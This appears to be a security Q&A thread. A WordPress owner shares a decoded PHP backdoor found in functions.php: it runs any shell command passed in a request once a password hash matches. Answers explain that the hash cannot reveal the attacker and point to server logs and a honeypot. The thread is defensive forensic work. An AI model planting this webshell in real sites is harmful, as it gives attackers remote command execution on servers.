Possible to decode md5 hash of a malicious URL?

Question

Context: I had a virus on my WordPress website server that injected itself into every functions.php file on the server across two different sites. After removing the heavily obfuscated virus code I decoded it. (I won't bore you with process details.) The resulting code was a simple backdoor that let the hackers execute code at the system level only from one specific URL that they control.

<?php 
$c = "2caf6917ca3d9a3a85d26029ed623b1a";
$p = md5(urldecode($_REQUEST["p"]));
if ($p != $c) exit;
$s = urldecode($_REQUEST["s"]);
if ($s == "") exit;
system($s);
exit;
?>

Is it possible to decode the md5 hash, and therefore learn which malicious website was using the back doors to my server?

The title and the body of your question don't match. In the title you ask about decoding the md5, in the body you ask about finding who used this backdoor. Please align title and body to show what you really want to know. — Steffen Ullrich, Dec 31 '19 at 08:27
I'd love to decode the md5 hash in hopes that it reveals the URL which attacked my site, but I suspect the hash is only one parameter of the URL. Another parameter of the URL is the code they want to execute, and the whole URL is probably invisible even if we could decode the md5 hash. — Jezza, Dec 31 '19 at 08:42
Could it be related to the following? https://stackoverflow.com/questions/32134960/my-website-got-hacked-what-does-this-code-do Same digest value in the answer. — Todd Johnson, Dec 31 '19 at 07:34
Yes, definitely related, and perhaps the same virus or at least the same people running viruses from a particular URL with that encoded URL value. I don't think it's going to be possible to decode that key back to a whole URL, because the p value is just a parameter of the URL, not the whole thing. — Jezza, Dec 31 '19 at 08:24
hashes by their nature cannot be reversed; they are a computation on the input. it's like saying "i have the number 100, what numbers did the original person add together to get that value?" — Joe, Dec 31 '19 at 16:03

Steffen Ullrich · Accepted Answer · 2019-12-31T09:26:48.320

Is it possible to decode the md5 hash, and therefore learn which malicious website was using the back doors to my server?

As for the (in)feasibilty to decode the md5 hash see for example here. In short: if it is simple you can brute force it, if it is complex it will be infeasible.

But even if you would be able to decode the hash: it does not contain the information you want, i.e. to know who is using the backdoor. This hash instead is just the hash of a password and if the password (parameter p) does not fit the predefined hash then the code will not be executed:

$c = "2caf6917ca3d9a3a85d26029ed623b1a";
$p = md5(urldecode($_REQUEST["p"]));
if ($p != $c) exit;

The command to execute instead is inside the parameter s:

$s = urldecode($_REQUEST["s"]);
if ($s == "") exit;
system($s);

But even this does not tell you who is using the backdoor but only what the attacker is doing. To get more information about the attacker you actually would need to look into the access log of your server. With luck you might find requests to your site with a path like this:

 /compromised.php?p=<password>&s=<command>

From this log you get the password and the command and you get also usually the IP address of the client which accessed the URL - i.e. the public IP address of the attacker. Note that this does not need to be the real IP address of the attacker since the attacker could use other systems (like a botnet) as jump hosts or could even embed this malicious action as URL into some site where it gets called by an innocent visitor - although in this case the attacker unlikely gets the output of the command.

Note that the request parameters might also be send as parameters inside a POST request in which case you only see the access to the compromised PHP script but not the parameters in the log. Yet, you still have the source IP address and you know when the backdoor was called. And you might disarm the backdoor (i.e. disable the call to system) and instead log parameters in the hope that the attacker will still try to use the backdoor.

It's most likely that `s` and `p` are sent as POST data (`$_REQUEST` merges both GET & POST data in PHP), so it won't appear in logs... But it costs nothing to check, bad attackers also exist :) — Benoit Esnard, Dec 31 '19 at 09:24
The other option if you really want to investigate this is to set up a honeypot. That is, put code onto your page that listens for the password and command and logs them. With any luck the attacker doesn't yet know it's been cleaned up, and tries to use the backdoor. (just remember not to actually run the command!) — Josiah, Dec 31 '19 at 18:17

Possible to decode md5 hash of a malicious URL?

1 Answers1